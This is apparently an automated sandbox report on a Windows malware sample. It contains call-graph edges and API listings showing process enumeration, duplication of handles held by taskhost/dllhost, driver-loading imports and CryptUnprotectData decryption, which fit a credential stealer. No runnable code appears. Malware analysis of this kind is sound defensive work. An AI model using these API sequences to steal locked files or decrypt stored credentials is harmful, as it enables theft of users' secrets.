39656 415c56 11 API calls 39632->39656 39633->39597 39634->39633 39644 415c56 11 API calls 39634->39644 39637->39634 39647 422640 13 API calls 39637->39647 39648 4226e0 12 API calls 39637->39648 39638->39600 39639->39598 39640->39607 39641->39607 39642->39607 39643->39607 39644->39613 39645->39607 39646->39607 39647->39637 39648->39637 39649->39613 39650->39612 39651->39633 39652->39626 39653->39624 39654->39624 39655->39632 39656->39613 39657->38715 39658->38722 39659 44dea5 39660 44deb5 FreeLibrary 39659->39660 39661 44dec3 39659->39661 39660->39661 39662 4147f3 39665 414561 39662->39665 39664 414813 39666 41456d 39665->39666 39667 41457f GetPrivateProfileIntW 39665->39667 39670 4143f1 memset _itow WritePrivateProfileStringW 39666->39670 39667->39664 39669 41457a 39669->39664 39670->39669 39671 44def7 39672 44df07 39671->39672 39673 44df00 ??3@YAXPAX 39671->39673 39674 44df17 39672->39674 39675 44df10 ??3@YAXPAX 39672->39675 39673->39672 39676 44df27 39674->39676 39677 44df20 ??3@YAXPAX 39674->39677 39675->39674 39678 44df37 39676->39678 39679 44df30 ??3@YAXPAX 39676->39679 39677->39676 39679->39678 39680 4287c1 39681 4287d2 39680->39681 39682 429ac1 39680->39682 39683 428818 39681->39683 39684 42881f 39681->39684 39698 425711 39681->39698 39694 425ad6 39682->39694 39750 415c56 11 API calls 39682->39750 39717 42013a 39683->39717 39745 420244 97 API calls 39684->39745 39689 4260dd 39744 424251 120 API calls 39689->39744 39691 4259da 39743 416760 11 API calls 39691->39743 39697 429a4d 39699 429a66 39697->39699 39704 429a9b 39697->39704 39698->39682 39698->39691 39698->39697 39700 422aeb memset memcpy memcpy 39698->39700 39703 4260a1 39698->39703 39713 4259c2 39698->39713 39716 425a38 39698->39716 39733 4227f0 memset memcpy 39698->39733 39734 422b84 15 API calls 39698->39734 39735 422b5d memset memcpy memcpy 39698->39735 39736 422640 13 API calls 39698->39736 39738 4241fc 11 API calls 39698->39738 39739 42413a 90 API calls 39698->39739 39746 415c56 11 API calls 39699->39746 39700->39698 39742 415c56 11 API calls 39703->39742 39705 429a96 39704->39705 39748 416760 11 API calls 39704->39748 39749 424251 120 API calls 39705->39749 39707 429a7a 39747 416760 11 API calls 39707->39747 39713->39694 39737 415c56 11 API calls 39713->39737 39716->39713 39740 422640 13 API calls 39716->39740 39741 4226e0 12 API calls 39716->39741 39718 42014c 39717->39718 39721 420151 39717->39721 39760 41e466 97 API calls 39718->39760 39720 420162 39720->39698 39721->39720 39722 4201b3 39721->39722 39723 420229 39721->39723 39724 4201b8 39722->39724 39725 4201dc 39722->39725 39723->39720 39726 41fd5e 86 API calls 39723->39726 39751 41fbdb 39724->39751 39725->39720 39729 4201ff 39725->39729 39757 41fc4c 39725->39757 39726->39720 39729->39720 39732 42013a 97 API calls 39729->39732 39732->39720 39733->39698 39734->39698 39735->39698 39736->39698 39737->39691 39738->39698 39739->39698 39740->39716 39741->39716 39742->39691 39743->39689 39744->39694 39745->39698 39746->39707 39747->39705 39748->39705 39749->39682 39750->39691 39752 41fbf1 39751->39752 39753 41fbf8 39751->39753 39756 41fc39 39752->39756 39775 4446ce 11 API calls 39752->39775 39765 41ee26 39753->39765 39756->39720 39761 41fd5e 39756->39761 39758 41ee6b 86 API calls 39757->39758 39759 41fc5d 39758->39759 39759->39725 39760->39721 39764 41fd65 39761->39764 39762 41fdab 39762->39720 39763 41fbdb 86 API calls 39763->39764 39764->39762 39764->39763 39766 41ee41 39765->39766 39767 41ee32 39765->39767 39776 41edad 39766->39776 39779 4446ce 11 API calls 39767->39779 39771 41ee3c 39771->39752 39773 41ee58 39773->39771 39781 41ee6b 39773->39781 39775->39756 39785 41be52 39776->39785 39779->39771 39780 41eb85 11 API calls 39780->39773 39782 41ee70 39781->39782 39783 41ee78 39781->39783 39823 41bf99 86 API calls 39782->39823 39783->39771 39786 41be6f 39785->39786 39787 41be5f 39785->39787 39791 41be8c 39786->39791 39817 418c63 memset memset 39786->39817 39816 4446ce 11 API calls 39787->39816 39789 41be69 39789->39771 39789->39780 39791->39789 39792 41bf3a 39791->39792 39794 41bed1 39791->39794 39797 41bee7 39791->39797 39820 4446ce 11 API calls 39792->39820 39796 41bef0 39794->39796 39798 41bee2 39794->39798 39796->39797 39800 41bf01 39796->39800 39797->39789 39821 41a453 86 API calls 39797->39821 39806 41ac13 39798->39806 39799 41bf24 memset 39799->39789 39800->39799 39802 41bf14 39800->39802 39818 418a6d memset memcpy memset 39800->39818 39819 41a223 memset memcpy memset 39802->39819 39805 41bf20 39805->39799 39807 41ac3f memset 39806->39807 39808 41ac52 39806->39808 39813 41acd9 39807->39813 39810 41ac6a 39808->39810 39822 41dc14 19 API calls 39808->39822 39811 41aca1 39810->39811 39812 41519d 6 API calls 39810->39812 39811->39813 39814 41acc0 memset 39811->39814 39815 41accd memcpy 39811->39815 39812->39811 39813->39797 39814->39813 39815->39813 39816->39789 39817->39791 39818->39802 39819->39805 39820->39797 39822->39810 39823->39783 39824 417bc5 39825 417c61 39824->39825 39826 417bda 39824->39826 39826->39825 39827 417bf6 UnmapViewOfFile CloseHandle 39826->39827 39829 417c2c 39826->39829 39831 4175b7 39826->39831 39827->39826 39827->39827 39829->39826 39836 41851e 20 API calls 39829->39836 39832 4175d6 CloseHandle 39831->39832 39833 4175c8 39832->39833 39834 4175df 39832->39834 39833->39834 39835 4175ce Sleep 39833->39835 39834->39826 39835->39832 39836->39829 39837 4148b6 FindResourceW 39838 4148cf SizeofResource 39837->39838 39841 4148f9 39837->39841 39839 4148e0 LoadResource 39838->39839 39838->39841 39840 4148ee LockResource 39839->39840 39839->39841 39840->39841 39842 441b3f 39852 43a9f6 39842->39852 39844 441b61 40025 4386af memset 39844->40025 39846 44189a 39847 442bd4 39846->39847 39848 4418e2 39846->39848 39849 4418ea 39847->39849 40027 441409 memset 39847->40027 39848->39849 40026 4414a9 12 API calls 39848->40026 39853 43aa20 39852->39853 39854 43aadf 39852->39854 39853->39854 39855 43aa34 memset 39853->39855 39854->39844 39856 43aa56 39855->39856 39857 43aa4d 39855->39857 40028 43a6e7 39856->40028 40036 42c02e memset 39857->40036 39862 43aad3 40038 4169a7 11 API calls 39862->40038 39863 43aaae 39863->39854 39863->39862 39878 43aae5 39863->39878 39864 43ac18 39867 43ac47 39864->39867 40040 42bbd5 memcpy memcpy memcpy memset memcpy 39864->40040 39868 43aca8 39867->39868 40041 438eed 16 API calls 39867->40041 39871 43acd5 39868->39871 40043 4233ae 11 API calls 39868->40043 40044 423426 11 API calls 39871->40044 39872 43ac87 40042 4233c5 16 API calls 39872->40042 39876 43ace1 40045 439811 163 API calls 39876->40045 39877 43a9f6 161 API calls 39877->39878 39878->39854 39878->39864 39878->39877 40039 439bbb 22 API calls 39878->40039 39880 43acfd 39886 43ad2c 39880->39886 40046 438eed 16 API calls 39880->40046 39882 43ad19 40047 4233c5 16 API calls 39882->40047 39883 43ad58 40048 44081d 163 API calls 39883->40048 39886->39883 39889 43add9 39886->39889 39888 43ae3a memset 39890 43ae73 39888->39890 39889->39889 40052 423426 11 API calls 39889->40052 40053 42e1c0 147 API calls 39890->40053 39891 43adab 40050 438c4e 163 API calls 39891->40050 39894 43ad6c 39894->39854 39894->39891 40049 42370b memset memcpy memset 39894->40049 39895 43adcc 40051 440f84 12 API calls 39895->40051 39896 43ae96 40054 42e1c0 147 API calls 39896->40054 39900 43aea8 39901 43aec1 39900->39901 40055 42e199 147 API calls 39900->40055 39903 43af00 39901->39903 40056 42e1c0 147 API calls 39901->40056 39903->39854 39906 43af1a 39903->39906 39907 43b3d9 39903->39907 40057 438eed 16 API calls 39906->40057 39912 43b3f6 39907->39912 39916 43b4c8 39907->39916 39909 43b60f 39909->39854 40116 4393a5 17 API calls 39909->40116 39910 43af2f 40058 4233c5 16 API calls 39910->40058 40098 432878 12 API calls 39912->40098 39914 43af51 40059 423426 11 API calls 39914->40059 39922 43b4f2 39916->39922 40104 42bbd5 memcpy memcpy memcpy memset memcpy 39916->40104 39918 43af7d 40060 423426 11 API calls 39918->40060 40105 43a76c 21 API calls 39922->40105 39923 43b529 40106 44081d 163 API calls 39923->40106 39924 43b462 40100 423330 11 API calls 39924->40100 39925 43af94 40061 423330 11 API calls 39925->40061 39929 43b47e 39933 43b497 39929->39933 40101 42374a memcpy memset memcpy memcpy memcpy 39929->40101 39930 43b544 39934 43b55c 39930->39934 40107 42c02e memset 39930->40107 39931 43b428 39931->39924 40099 432b60 16 API calls 39931->40099 39932 43afca 40062 423330 11 API calls 39932->40062 40102 4233ae 11 API calls 39933->40102 40108 43a87a 163 API calls 39934->40108 39940 43afdb 40063 4233ae 11 API calls 39940->40063 39942 43b56c 39945 43b58a 39942->39945 40109 423330 11 API calls 39942->40109 39943 43b4b1 40103 423399 11 API calls 39943->40103 39944 43afee 40064 44081d 163 API calls 39944->40064 40110 440f84 12 API calls 39945->40110 39950 43b4c1 40112 42db80 163 API calls 39950->40112 39952 43b592 40111 43a82f 16 API calls 39952->40111 39955 43b5b4 40113 438c4e 163 API calls 39955->40113 39957 43b5cf 40114 42c02e memset 39957->40114 39959 43b1ef 40075 4233c5 16 API calls 39959->40075 39960 43b005 39960->39854 39963 43b01f 39960->39963 40065 42d836 163 API calls 39960->40065 39963->39959 40073 423330 11 API calls 39963->40073 40074 42d71d 163 API calls 39963->40074 39964 43b212 40076 423330 11 API calls 39964->40076 39965 43b087 40066 4233ae 11 API calls 39965->40066 39967 43add4 39967->39909 40115 438f86 16 API calls 39967->40115 39971 43b22a 40077 42ccb5 11 API calls 39971->40077 39973 43b10f 40069 423330 11 API calls 39973->40069 39974 43b23f 40078 4233ae 11 API calls 39974->40078 39976 43b257 40079 4233ae 11 API calls 39976->40079 39980 43b129 40070 4233ae 11 API calls 39980->40070 39981 43b26e 40080 4233ae 11 API calls 39981->40080 39984 43b09a 39984->39973 40067 42cc15 19 API calls 39984->40067 40068 4233ae 11 API calls 39984->40068 39985 43b282 40081 43a87a 163 API calls 39985->40081 39987 43b13c 40071 440f84 12 API calls 39987->40071 39989 43b29d 40082 423330 11 API calls 39989->40082 39992 43b15f 40072 4233ae 11 API calls 39992->40072 39993 43b2af 39995 43b2b8 39993->39995 39996 43b2ce 39993->39996 40083 4233ae 11 API calls 39995->40083 40084 440f84 12 API calls 39996->40084 39999 43b2da 40085 42370b memset memcpy memset 39999->40085 40000 43b2c9 40086 4233ae 11 API calls 40000->40086 40003 43b2f9 40087 423330 11 API calls 40003->40087 40005 43b30b 40088 423330 11 API calls 40005->40088 40007 43b325 40089 423399 11 API calls 40007->40089 40009 43b332 40090 4233ae 11 API calls 40009->40090 40011 43b354 40091 423399 11 API calls 40011->40091 40013 43b364 40092 43a82f 16 API calls 40013->40092 40015 43b370 40093 42db80 163 API calls 40015->40093 40017 43b380 40094 438c4e 163 API calls 40017->40094 40019 43b39e 40095 423399 11 API calls 40019->40095 40021 43b3ae 40096 43a76c 21 API calls 40021->40096 40023 43b3c3 40097 423399 11 API calls 40023->40097 40025->39846 40026->39849 40027->39847 40029 43a6f5 40028->40029 40030 43a765 40028->40030 40029->40030 40117 42a115 40029->40117 40030->39854 40037 4397fd memset 40030->40037 40034 43a73d 40034->40030 40035 42a115 147 API calls 40034->40035 40035->40030 40036->39856 40037->39863 40038->39854 40039->39878 40040->39867 40041->39872 40042->39868 40043->39871 40044->39876 40045->39880 40046->39882 40047->39886 40048->39894 40049->39891 40050->39895 40051->39967 40052->39888 40053->39896 40054->39900 40055->39901 40056->39901 40057->39910 40058->39914 40059->39918 40060->39925 40061->39932 40062->39940 40063->39944 40064->39960 40065->39965 40066->39984 40067->39984 40068->39984 40069->39980 40070->39987 40071->39992 40072->39963 40073->39963 40074->39963 40075->39964 40076->39971 40077->39974 40078->39976 40079->39981 40080->39985 40081->39989 40082->39993 40083->40000 40084->39999 40085->40000 40086->40003 40087->40005 40088->40007 40089->40009 40090->40011 40091->40013 40092->40015 40093->40017 40094->40019 40095->40021 40096->40023 40097->39967 40098->39931 40099->39924 40100->39929 40101->39933 40102->39943 40103->39950 40104->39922 40105->39923 40106->39930 40107->39934 40108->39942 40109->39945 40110->39952 40111->39950 40112->39955 40113->39957 40114->39967 40115->39909 40116->39854 40118 42a175 40117->40118 40120 42a122 40117->40120 40118->40030 40123 42b13b 147 API calls 40118->40123 40120->40118 40121 42a115 147 API calls 40120->40121 40124 43a174 40120->40124 40148 42a0a8 147 API calls 40120->40148 40121->40120 40123->40034 40138 43a196 40124->40138 40139 43a19e 40124->40139 40125 43a306 40125->40138 40162 4388c4 14 API calls 40125->40162 40128 42a115 147 API calls 40128->40139 40129 415a91 memset 40129->40139 40130 43a642 40130->40138 40167 4169a7 11 API calls 40130->40167 40134 43a635 40166 42c02e memset 40134->40166 40138->40120 40139->40125 40139->40128 40139->40129 40139->40138 40149 42ff8c 40139->40149 40157 4165ff 11 API calls 40139->40157 40158 439504 13 API calls 40139->40158 40159 4312d0 147 API calls 40139->40159 40160 42be4c memcpy memcpy memcpy memset memcpy 40139->40160 40161 43a121 11 API calls 40139->40161 40141 4169a7 11 API calls 40142 43a325 40141->40142 40142->40130 40142->40134 40142->40138 40142->40141 40143 42b5b5 memset memcpy 40142->40143 40144 42bf4c 14 API calls 40142->40144 40163 42b63e 14 API calls 40142->40163 40164 4165ff 11 API calls 40142->40164 40165 42bfcf memcpy 40142->40165 40143->40142 40144->40142 40148->40120 40168 43817e 40149->40168 40151 42ff99 40152 42ffe3 40151->40152 40153 42ffd0 40151->40153 40156 42ff9d 40151->40156 40173 4169a7 11 API calls 40152->40173 40172 4169a7 11 API calls 40153->40172 40156->40139 40157->40139 40158->40139 40159->40139 40160->40139 40161->40139 40162->40142 40163->40142 40164->40142 40165->40142 40166->40130 40167->40138 40169 438187 40168->40169 40171 438192 40168->40171 40174 4380f6 40169->40174 40171->40151 40172->40156 40173->40156 40176 43811f 40174->40176 40175 438164 40175->40171 40176->40175 40179 437e5e 40176->40179 40202 4300e8 memset memset memcpy 40176->40202 40203 437d3c 40179->40203 40181 437eb3 40181->40176 40182 437ea9 40182->40181 40188 437f22 40182->40188 40218 41f432 40182->40218 40185 437f06 40229 415c56 11 API calls 40185->40229 40187 437f95 40230 415c56 11 API calls 40187->40230 40189 432d4e 3 API calls 40188->40189 40192 437f7f 40188->40192 40189->40192 40190 43802b 40231 4165ff 11 API calls 40190->40231 40192->40187 40192->40190 40193 437fa3 40193->40181 40235 41f638 104 API calls 40193->40235 40195 438054 40232 437371 138 API calls 40195->40232 40198 43806b 40199 438094 40198->40199 40233 42f50e 138 API calls 40198->40233 40199->40193 40234 4300e8 memset memset memcpy 40199->40234 40202->40176 40204 437d69 40203->40204 40207 437d80 40203->40207 40236 437ccb 11 API calls 40204->40236 40206 437d76 40206->40182 40207->40206 40208 437da3 40207->40208 40210 437d90 40207->40210 40211 438460 134 API calls 40208->40211 40210->40206 40240 437ccb 11 API calls 40210->40240 40214 437dcb 40211->40214 40212 437de8 40239 424f26 123 API calls 40212->40239 40214->40212 40237 444283 13 API calls 40214->40237 40216 437dfc 40238 437ccb 11 API calls 40216->40238 40224 41f44f 40218->40224 40228 41f54d 40218->40228 40219 41f466 40219->40185 40219->40188 40224->40219 40226 41f50b 40224->40226 40241 41f1a5 40224->40241 40266 41c06f memcmp 40224->40266 40267 41f3b1 90 API calls 40224->40267 40268 41f398 86 API calls 40224->40268 40226->40219 40226->40228 40269 41c295 86 API calls 40226->40269 40228->40219 40270 41c635 memset memset 40228->40270 40229->40181 40230->40193 40231->40195 40232->40198 40233->40199 40234->40193 40235->40181 40236->40206 40237->40216 40238->40212 40239->40206 40240->40206 40242 41bc3b 101 API calls 40241->40242 40243 41f1b4 40242->40243 40244 41edad 86 API calls 40243->40244 40251 41f282 40243->40251 40245 41f1cb 40244->40245 40246 41f1f5 memcmp 40245->40246 40247 41f20e 40245->40247 40245->40251 40246->40247 40248 41f21b memcmp 40247->40248 40247->40251 40249 41f326 40248->40249 40252 41f23d 40248->40252 40250 41ee6b 86 API calls 40249->40250 40249->40251 40250->40251 40251->40224 40252->40249 40253 41f28e memcmp 40252->40253 40255 41c8df 56 API calls 40252->40255 40253->40249 40254 41f2a9 40253->40254 40254->40249 40257 41f308 40254->40257 40258 41f2d8 40254->40258 40256 41f269 40255->40256 40256->40249 40259 41f287 40256->40259 40260 41f27a 40256->40260 40257->40249 40264 4446ce 11 API calls 40257->40264 40261 41ee6b 86 API calls 40258->40261 40259->40253 40262 41ee6b 86 API calls 40260->40262 40263 41f2e0 40261->40263 40262->40251 40265 41b1ca memset 40263->40265 40264->40249 40265->40251 40266->40224 40267->40224 40268->40224 40269->40228 40270->40219 40271 41493c EnumResourceNamesW 40272 44660a 40275 4465e4 40272->40275 40274 446613 40276 4465f3 __dllonexit 40275->40276 40277 4465ed _onexit 40275->40277 40276->40274 40277->40276

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                    • API String ID: 708747863-3398334509
                                                                                                                                                                                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                    • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                                                                                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 3536422406-1740548384
                                                                                                                                                                                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                    • String ID: BIN
                                                                                                                                                                                                                    • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
